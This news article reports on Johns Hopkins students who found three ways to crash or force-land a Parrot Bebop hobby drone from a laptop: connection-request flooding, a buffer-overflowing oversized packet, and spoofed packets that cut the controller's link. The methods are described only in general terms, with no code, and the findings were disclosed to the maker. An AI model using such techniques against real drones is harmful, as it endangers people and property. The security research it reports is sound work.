A Johns Hopkins University computer security team says it is raising concerns about how easily hackers could cause consumer unmanned aircraft systems (UAS) to ignore their human controllers and crash.
Five computer science graduate students and their professor have discovered three different ways to send rogue commands from a computer laptop to interfere with an airborne hobby drone’s normal operation and then land it or send it plummeting. In the university’s video footage showing the tests, a Parrot Bebop model is used.
“You see it with a lot of new technology,” explains Lanier A. Watkins, who supervised the recent drone research at Johns Hopkins’ Homewood, Md., campus. “Security is often an afterthought. The value of our work is in showing that the technology in these drones is highly vulnerable to hackers.”
Watkins is a senior cyber security research scientist at the university’s Whiting School of Engineering. He also holds appointments with the Johns Hopkins Applied Physics Laboratory and the Johns Hopkins Information Security Institute.
During the past school year, Watkins’ master’s degree students were required to apply what they’d learned about information security by completing a capstone project. Watkins suggested they do wireless network penetration testing on a consumer UAS and, using the vulnerabilities they found, develop exploits to disrupt the process that enables a drone’s operator on the ground to manage the flight.
An exploit, explains Michael Hooper, one of the student researchers, is a “piece of software typically directed at a computer program or device to take advantage of a programming error or flaw in that device.”
In the team’s first exploit, the students bombarded a drone with about 1,000 wireless connection requests in rapid succession; each asked for control of the aircraft. This digital deluge overloaded the aircraft’s central processing unit and caused it to shut down: That sent the drone into what the team referred to as an uncontrolled landing.
In the second hack, the team sent the drone an exceptionally large data packet – exceeding the capacity of a buffer in the aircraft’s flight application. Again, this caused the drone to crash.
For the third exploit, the researchers repeatedly sent a fake digital packet from their laptop to the drone’s controller to tell it that the packet’s sender was the drone itself. Eventually, the researchers said, the drone’s controller started to believe that the packet sender was indeed the aircraft. The controller severed its own contact with the drone, which eventually made an emergency landing.
“We found three points that were actually vulnerable, and they were vulnerable in a way that we could actually build exploits for,” Watkins explains. “We demonstrated here that not only could someone remotely force the drone to land, but they could also remotely crash it in their yard and just take it.”
In accordance with university policy, the researchers described their drone exploit findings in a vulnerability disclosure package and sent it earlier this year to the maker of the drone that was tested. By the end of May, the company had not responded to the findings. More recently, says the university, the researchers began testing higher-priced drone models to see if these devices are similarly vulnerable to hacking.
Watkins says he hopes the studies serve as a wake-up call so that future drones will leave the factories with enhanced security features already on board and not rely on later bug fixes.
Photo courtesy of Will Kirk/Johns Hopkins University: Lanier A. Watkins, left, and Michael Hooper, right